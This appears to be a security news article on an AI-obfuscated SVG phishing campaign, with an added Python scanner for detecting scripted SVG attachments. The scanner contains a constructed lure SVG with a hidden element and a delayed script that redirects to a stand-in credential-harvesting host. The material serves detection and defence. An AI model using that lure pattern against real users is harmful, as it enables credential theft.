Cybercriminals are taking another step: deceptive e-mails not only read more convincingly but are also more cleverly constructed. Microsoft describes a campaign that uses language-model-generated code hidden in an SVG file styled as a tidy business chart. The chart is complete with terms like "revenue" and "shares" that in reality serve as keys for running hidden scripts and sending victims to counterfeit login pages. The pattern fits a broader shift in which AI not only drafts the lure but also conceals the machinery behind the bait.
The attack starts from an already compromised business e-mail account and poses as a document-sharing notification. The attachment looks like a PDF but is an SVG carrying JavaScript. The sender appears to mail itself, with the real targets in BCC, so simple filters see nothing suspicious. Once opened, the file detours via a CAPTCHA, after which a bogus portal harvests login credentials. Microsoft notes that the code does not read like something a developer would write off the cuff: it is long-winded, overly modular and full of generic comment lines. That is exactly the kind of synthetic markup built to shake off static analysis and sandboxing.
SVG is so attractive to attackers because it is text-based and scriptable: invisible elements, delayed execution and encoded attributes can all be used to hide payloads. Security professionals have long warned that the format lends itself to cross-site scripting and click hijacking, and the Microsoft case shows AI taking those capabilities a level further. AI is now entering the picture defensively as well: Security Copilot was used to recognize the synthetic fingerprint and block the attack, but the lesson is that this approach will be copied.
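To make "treat SVG as an active document" concrete, here is an added Python example (not code from Microsoft's report, from Security Copilot, or from the campaign itself). It classifies an attachment by content rather than file name, so a "PDF" that is really SVG is caught, and then walks the SVG for the markers the article lists: script elements, event-handler attributes, javascript: links, hidden elements, and scripts that use timers or read decoy text from the markup. The sample SVG is constructed here to resemble the described business-graph lure; the function names, the decoy-extension list and the heuristics are the editor's own assumptions, not Microsoft's detection logic.

```python
"""Heuristic scanner for SVG e-mail attachments that carry active content.

Added example: not Microsoft's detector and not the campaign's own code.
The sample SVG below is constructed to resemble the "business graph" lure
described in the article; the heuristics are the editor's assumptions.
"""
import re
import xml.etree.ElementTree as ET  # prefer defusedxml in production (entity bombs)

EVENT_ATTR = re.compile(r"^on[a-z]+$", re.I)            # onload, onclick, ...
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|opacity\s*:\s*0(?![.\d])", re.I)
DELAYED_EXEC = re.compile(r"\b(setTimeout|setInterval|requestAnimationFrame)\s*\(")
READS_MARKUP = re.compile(r"\b(getElementById|querySelector|textContent|getAttribute)\b")
DECOY_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx"}  # assumed decoy list

# Constructed sample: bars labelled "revenue"/"shares", an invisible group holding
# a "key", and a script that reads that key and redirects after a delay.
SAMPLE_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" width="400" height="300">
  <rect x="20" y="200" width="40" height="80" fill="#4a90d9"/>
  <text x="20" y="190">revenue</text>
  <rect x="80" y="150" width="40" height="130" fill="#4a90d9"/>
  <text x="80" y="140">shares</text>
  <g opacity="0"><text id="k1">revenue</text></g>
  <script type="text/javascript"><![CDATA[
    var key = document.getElementById("k1").textContent;
    setTimeout(function () { location.href = "https://login.example.invalid/?k=" + key; }, 3000);
  ]]></script>
  <a xlink:href="javascript:void(0)"><text x="200" y="250">Open document</text></a>
</svg>"""


def _local(qname: str) -> str:
    """Strip an XML namespace: '{http://www.w3.org/2000/svg}script' -> 'script'."""
    return qname.rsplit("}", 1)[-1].lower()


def sniff(data: bytes) -> str:
    """Classify by content, never by file name."""
    head = data.lstrip()[:512].lower()
    if head.startswith(b"%pdf-"):
        return "pdf"
    if b"<svg" in head:
        return "svg"
    return "unknown"


def scan_svg(text: str) -> list:
    """Return (kind, detail) findings for active or hidden content in an SVG."""
    findings = []
    root = ET.fromstring(text)
    for el in root.iter():
        name = _local(el.tag)
        if name == "script":
            body = el.text or ""
            findings.append(("script_element", body.strip()[:40]))
            if DELAYED_EXEC.search(body):
                findings.append(("delayed_execution", "timer in script"))
            if READS_MARKUP.search(body):
                findings.append(("reads_markup", "script reads decoy text/attributes"))
        elif name == "foreignobject":
            findings.append(("foreign_object", "HTML embedded in SVG"))
        for attr, val in el.attrib.items():
            a = _local(attr)
            v = val.strip().lower()
            if EVENT_ATTR.match(a):
                findings.append(("event_handler", f"<{name} {a}>"))
            elif a == "href" and v.startswith(("javascript:", "data:")):
                findings.append(("active_href", val[:40]))
            elif a == "style" and HIDDEN_STYLE.search(v):
                findings.append(("hidden_element", name))
            elif a in ("opacity", "fill-opacity") and v in ("0", "0.0"):
                findings.append(("hidden_element", name))
            elif a == "display" and v == "none":
                findings.append(("hidden_element", name))
    return findings


def check_attachment(filename: str, data: bytes) -> dict:
    """Combine name/content mismatch with the active-content scan."""
    parts = filename.lower().split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    kind = sniff(data)
    result = {"filename": filename, "declared": ext, "actual": kind,
              "mismatch": False, "active": False, "findings": []}
    if kind == "svg":
        # "report.pdf" that is really SVG, or "report.pdf.svg" with a decoy extension
        result["mismatch"] = ext != "svg" or any(p in DECOY_EXTS for p in parts[1:-1])
        result["findings"] = scan_svg(data.decode("utf-8", "replace"))
        kinds = {k for k, _ in result["findings"]}
        result["active"] = bool(kinds & {"script_element", "event_handler",
                                         "active_href", "foreign_object"})
    return result


if __name__ == "__main__":
    verdict = check_attachment("Q3_figures.pdf.svg", SAMPLE_SVG.encode())
    print(verdict["actual"], "mismatch:", verdict["mismatch"], "active:", verdict["active"])
    for kind, detail in verdict["findings"]:
        print(f"  {kind}: {detail}")
```

The verdict is deliberately structural: an SVG is flagged "active" on the presence of a script, handler, javascript: link or foreignObject, before anyone tries to decode what the script does, which is the point of scoring on structure rather than on the words in the file. Hidden elements and timer calls are recorded as supporting findings rather than verdicts on their own, since legitimate graphics occasionally use both.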
While this campaign was limited in scale, other files show attackers walking several paths at once. Forcepoint describes a chain in which e-mail attachments lead to XWorm: shellcode, reflective DLL injection and memory-loaded modules let the later stages slip past security controls. All these variants wrap the trick in seemingly empty or corrupt Office files to dampen suspicion; the end goal remains remote control and data theft.
Lures are also getting more creative. Avigdor tracks campaigns that send fake legal letters about alleged copyright violations and push victims through a Telegram profile or a tidy-looking PDF to info-stealers. The names that keep returning are PureLogs and a newcomer known as Lone None. The tactics change from one iteration to the next, but the core stays the same: urgency and the appearance of legitimacy get people moving, and the click does the rest.
Boiled down to its core, all this shows three movements. Attackers are exploiting AI to cloak code in formats we perceive as safe. Attack chains are becoming modular, so that a blocked step can be replaced immediately. And social-engineering lures keep evolving toward the language and processes of everyday work.

It therefore pays to organize defenses around behavior, content and chain rather than just around attachments and subject lines: score incoming e-mail on structure and not just words, treat SVG as an active document, and keep reminding teams that a file that looks like a graphic can be a program just as much as an executable can. Organizations that train reporting and response on real examples find that risk awareness rises without disrupting operations. And those that build clear alternative routes into the process, such as secure file-sharing portals and a quick way to forward suspicious messages, reduce the temptation to click outside the lines and make a difference before the first warning light comes on.
Disclaimer: This article is informational and not tailored security advice; consult official bulletins and primary sources before taking technical measures.